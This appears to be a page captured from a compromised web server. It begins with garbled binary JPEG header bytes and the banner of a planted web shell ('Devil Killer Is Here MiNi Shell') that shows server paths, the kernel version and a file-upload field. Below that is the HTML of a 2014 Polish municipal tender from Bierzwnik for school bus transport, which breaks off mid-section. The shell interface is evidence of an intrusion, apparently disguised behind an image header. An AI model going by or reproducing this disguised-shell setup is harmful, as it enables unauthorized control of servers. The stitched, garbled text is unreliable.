JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140317/89252-N-2014.html

<p class="kh_header"><b>Bierzwnik: Przewóz uczniów w celu realizacji zajęć dodatkowych oraz przewóz na wyjazdach edukacyjno - sportowych wykonywanych w ramach projektu o tytule Tropem nauki.</b><br>
<b>Numer ogłoszenia: 89252 - 2014; data zamieszczenia: 17.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bierzwnik , ul. Kopernika 2, 73-240 Bierzwnik, woj. zachodniopomorskie, tel. 95 768 01 30, faks 95 768 01 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.bierzwnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz uczniów w celu realizacji zajęć dodatkowych oraz przewóz na wyjazdach edukacyjno - sportowych wykonywanych w ramach projektu o tytule Tropem nauki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przewóz uczestników projektu (uczniów)  z/na zajęcia dodatkowe w poszczególnych szkołach oraz na pływalnię w Choszcznie.
Zamówienie jest realizowane w ramach projektu pn. Tropem nauki. Projekt realizowany jest w partnerstwie przez Gminę Bierzwnik (partner w projekcie) oraz Fundację Rozwoju Demokracji Lokalnej Centrum Szkoleniowe w Szczecinie - nr umowy UDA-POKL.09.01.02-32-017/12. Projekt  współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Usługa transportowa będzie realizowana w następujących szkołach: 
- Szkole Podstawowej w Bierzwniku, ul. Sienkiewicza 17, 73-240 Bierzwnik,
- Szkole Podstawowej w Łasku, Łasko 14, 37, 73-240 Bierzwnik,
- Szkole Podstawowej w Zieleniewie, Zieleniewo 37, 73-240 Bierzwnik,
-Gimnazjum Publicznym w Bierzwniku, ul. Krajowej Rady Narodowej 18, 73-240 Bierzwnik.
1. Przedmiot zamówienia obejmuje usługę transportową polegającą na:
a) przewozie uczniów - uczestników projektu i opiekunów na zajęcia oraz z zajęć na pływalni w ramach wyjazdów edukacyjno-sportowych).
b) przewozie uczniów - uczestników projektu z zajęć pozalekcyjnych do miejscowości zamieszkania uczniów po zajęciach i z miejscowości zamieszkania na zajęcia do szkół.
2.	
a) Zamawiający zapewnia opiekunów podczas wyjazdów na pływalnię.
b) Wykonawca zobowiązany jest do zapewnienia opieki osoby dorosłej uczniom podczas wsiadania, wysiadania oraz podczas jazdy w przypadku przewozu uczestników w ramach zajęć dodatkowych odbywających w szkołach. 
3. Miejsce wsiadania/wysiadania - przystanki w miejscowościach/ poszczególne szkoły. 
4. Szacunkowe trasy zostały podane w tabeli nr 1, 2,3 i 4 poniżej.
5. Dokładny harmonogram przewozów będzie ustalony pomiędzy Wykonawcą a Koordynatorami w poszczególnych szkołach. Harmonogram przewozów uczniów może ulec zmianie w trakcie trwania umowy, będzie uzależniony od zmiany harmonogramu zajęć pozalekcyjnych w poszczególnych szkołach.
6. Zarówno ilość kilometrów, trasy jak i ilość dzieci może ulec zmianie w zależności od zmiany planu zajęć pozalekcyjnych oraz zmian uczniów uczestniczących w zajęciach pozalekcyjnych. Wykonawca może zaproponować własne warianty przewozu dzieci, przy założeniu dowiezienia wszystkich dzieci objętych przewozami, lecz nie mogą te propozycje powodować zwiększenia kosztów ponoszonych na przewozy (wskazane jest uzyskanie korzyści w postaci obniżenia kosztów).
7. Koszt dojazdu autobusu z bazy do miejsca odbioru uczniów leży po stronie Wykonawcy.
8. Koszt dojazdu do bazy autobusu z przystanku/szkoły (po odwozie ostatniego uczestnika) leży po stronie Wykonawcy.
9. Podstawą naliczenia należności za usługi będące przedmiotem zamówienia, będzie stawka za 1 kilometr pomnożona przez ilość faktycznie przejechanych kilometrów z przewożonymi uczestnikami projektu.
10. Należy przyjąć iż terminy wyjazdów na pływalnię w poszczególnych szkołach nie będą się pokrywać.
11. Zamawiający przewiduje iż wyjazdy na pływalnię mogą odbywać się w soboty. 
Zestawienie tras dla poszczególnych szkół: I. Tabela nr 1: TRANSPORT UCZNIÓW REALIZOWANY W SZKOLE PODSTAWOWEJ W BIERZWNIKU 1. Trasa: Bierzwnik (szkoła Podstawowa)- Górzno-Kolsk; Ilość dzieci na jeden kurs: 15; Szacunkowa ilość km: 20 km x 12 przewozów = 240 km.
2. Wyjazdy edukacyjno-sportowe. Trasa: Górzno - Kolsk - Bierzwnik (SP Bierzwnik) - Jaglisko - Klasztorne - Przeczno - Strumienno - Choszczno (Pływalnia Wodny Raj)- Przeczno - Strumienno - Jaglisko- Klasztorne - Bierzwnik (SP Bierzwnik)- Kolsk - Górzno; Ilość dzieci na jeden kurs: 30 uczniów plus 2 opiekunów; Szacunkowa ilość km: 6 przewozów x 154 km = 924 km. Łączna szacunkowa ilość kilometrów  dla szkoły Podstawowej w Bierzwniku - 1 164 km. II. Tabela nr 2: TRANSPORT UCZNIÓW REALIZOWANY W SZKOLE PODSTAWOWEJ W ŁASKU 1.Trasa: Łasko (Szkoła Podstawowa) - Antoniewko; Ilość dzieci na jeden kurs: 7 uczniów; Szacunkowa ilość km: 10 km x  21 przewozy = 210 km; 2. Trasa: Łasko (Szkoła Podstawowa) - Breń; Ilość dzieci na jeden kurs: 8 uczniów; Szacunkowa ilość km: 10 km x 21 przewozy =210 km; 3. Wyjazdy edukacyjno - sportowe: Trasa: Antoniewko - Łasko (SP Łasko)- Breń - Choszczno (Pływalnia Wodny Raj)- Breń - Łasko (SP Łasko)- Antoniewko; Ilość dzieci na jeden kurs: 30 uczniów plus 2 opiekunów; Szacunkowa ilość km: 6 przewozów x 82 km = 492 km. Łączna szacunkowa ilość kilometrów dla Szkoły Podstawowej w Łasku - 912 km.  III. Tabela nr 3: TRANSPORT UCZNIÓW REALIZOWANY W SZKOLE PODSTAWOWEJ W ZIELENIEWIE 1. Trasa: Zieleniewo (Szkoła Podstawowa) - Kaszewo -  Malczewo - Pławno; Ilość dzieci na jeden kurs: 10 uczniów; Szacunkowa liczba uczniów i kilometrów: 18 km x  20 przewozów =  360 km. 2.Wyjazdy edukacyjno - sportowe. Trasa: Pławno - Malczewo  - Zieleniewo (SP Zieleniewo) - Kaszewo - Choszczno (Pływalnia Wodny Raj) - Kaszewo - Zieleniewo (SP Zieleniewo) - Malczewo - Pławno; Ilość dzieci na jeden kurs: 30 uczestników plus 2 opiekunów; Szacunkowa liczba kilometrów: 6  przewozów x  50 km = 300 km. Łączna szacunkowa  ilość kilometrów dla Szkoły Podstawowej w Zieleniewie - 660 km. IV. Tabela nr 4: TRANSPORT UCZNIÓW REALIZOWANY W GIMNAZJUM PUBLICZNYM W BIERZWNIKU 1.	Trasa: Bierzwnik (Gimnazjum Publiczne) -Breń-Łasko-Wygon; Ilość dzieci na jeden kurs: 7 uczniów; Szacunkowa ilość km: 26 km x 12 przewozów = 312 km; 2. Trasa: Bierzwnik (Gimnazjum Publiczne)- Jaglisko- Klasztorne; Ilość dzieci na jeden kurs:8 uczniów; Szacunkowa ilość km: 14  km x 12 przewozów = 168 km; 3. Wyjazd edukacyjno - sportowy: Jaglisko - Klasztorne-Bierzwnik (Gimnazjum) - Breń Łasko - Wygon - Choszczno (Pływalnia Wodny Raj) - Breń - łasko - Wygon - Bierzwnik (Gimnazjum)- Jaglisko - Klasztorne; Ilość dzieci na jeden kurs: 30 uczniów plus 2 opiekunów; Szacunkowa ilość km: 6 przewozów x 138 km =  828 km. Łączna szacunkowa  ilość kilometrów dla Gimnazjum w Bierzwniku - 1 308 km. Szacunkowa  łączna ilość kilometrów  dla wszystkich szkół - 4 044 km..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, zgodnie z art. 67 ust. 1 pkt. 6 Ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.14.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony: a)	jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z  art. 22 ust. 1 pkt 1 - 4 Ustawy Prawo zamówień publicznych - zał. 2a,
b) jeżeli wykonawca złoży aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c) jeśli Wykonawca złoży potwierdzoną za zgodność z oryginałem kopię licencji lub zezwolenia na prowadzenie działalności w zakresie transportu drogowego osób, zgodnie z Ustawą z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz. U. z 2012 poz. 1265).
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony: 
a) jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z  art. 22 ust. 1 pkt 1 - 4 Ustawy Prawo zamówień publicznych - zał. 2a,
b) jeśli Wykonawca wykaże się iż  wykonał w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch usług o wartości co najmniej: 15 000,00 złotych brutto każda, których przedmiotem był przewóz uczniów. W celu potwierdzenia spełnienia niniejszego warunku należy wypełnić  dokument według wzoru stanowiącego załącznik nr 5 do SIWZ. Do  załącznika należy dołączyć dokumenty potwierdzające wykonanie tych usług - referencje. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony: 
a) jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających  z art. 22 ust. 1 pkt 1 - 4 Ustawy Prawo zamówień publicznych - zał. 2a,
b) Jeżeli wykonawca wykaże iż dysponuje do wykonania zadania minimum 2 autokarami                   o minimalnej liczbie miejsc siedzących 32 (30 uczniów + 2 opiekunów), przystosowanym do przewozu uczniów (tj. właściwie oznakowanych zgodnie z obowiązującymi przepisami)
c) Zamawiający wymaga aby pojazdy nie były starsze niż 10 lat (licząc od dnia otwarcia ofert).        W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest przedłożyć kopię dowodu rejestracyjnego oraz kopię aktualnego zaświadczenia badania technicznego dopuszczającego pojazd do ruchu (może być kserokopia dowodu rejestracyjnego z aktualnym wpisem badania technicznego). W przypadku, gdy wykonawca korzystał będzie z pojazdów innego podmiotu, należy dołączyć pisemne zobowiązanie tego podmiotu, potwierdzające fakt oddania autokarów do dyspozycji wykonawcy, na czas wykonywania usługi (obowiązywania umowy). Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony: 
a) jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających  z art. 22 ust. 1 pkt 1 - 4 Ustawy Prawo zamówień publicznych - zał. 2a.
b) jeżeli wykonawca zapewni do zadania kierowców z wymaganiami kwalifikacyjnymi do prowadzenia pojazdów ( uprawnienia kategorii D, łącznie z badaniami psychologicznymi). W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób (załącznik 3), które będą wykonywać zamówienie wraz z kopią prawa jazdy Kat. D oraz kopię zaświadczenia poświadczającego uprawnienia do wykonywania zawodu kierowcy lub świadectwa kwalifikacji. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony: 
a) jeżeli wykonawca złoży oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 pkt 1-4 Ustawy Prawo zamówień publicznych - zał. 2a,
b) jeżeli wykonawca udowodni iż posiada  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. W celu potwierdzenia spełniania niniejszego warunku Wykonawca (każdy z Wykonawców składających ofertę wspólną) musi złożyć ksero dowodu wpłaty potwierdzającego posiadanie ubezpieczenia lub inny dokument  potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania /odrzuceniem jego oferty/. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
a) zmiana terminu wykonania zamówienia w przypadku zmiany umowy o dofinansowanie projektu UDA - POKL.09.01.02 - 32 - 017/12. 
b) zmiana okresu realizacji umowy jest możliwa w przypadku zmian w projekcie.
c) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
d) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy. 
e) W przypadku zmiany ilości km i tras w poszczególnych szkołach wynikających ze zmiany uczniów uczestniczących w zajęciach lub wyjazdach na pływalnię lub zmiany planu zajęć. 
2. Pozostałe zmiany:
